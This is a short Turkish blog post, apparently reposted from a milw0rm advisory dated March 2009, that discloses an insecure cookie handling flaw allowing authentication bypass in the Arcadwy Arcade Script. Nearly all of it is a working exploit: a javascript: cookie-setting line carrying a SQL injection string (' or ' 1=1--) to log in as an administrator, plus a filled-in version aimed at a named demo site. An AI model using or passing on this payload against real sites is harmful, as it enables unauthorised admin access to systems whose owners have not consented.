ZoRLu | ZRL | Buffer Overflow: Arcadwy Arcade Script (Auth Bypass) Insecure Cookie Handling Vuln

30 Mart 2009 Pazartesi

Arcadwy Arcade Script (Auth Bypass) Insecure Cookie Handling Vuln

Kaynak: http://www.milw0rm.com/exploits/8304



Discovered By: ZoRLu

Demo:

http://games.arcadwy.com/

Exploit:

javascript:document.cookie = "user=[admin_id],' or ' 1=1--; path=/";

Exploit for demo:

javascript:document.cookie = "user=1,' or ' 1=1--; path=/";

0 yorum:

Kaydol: Kayıt Yorumları (Atom)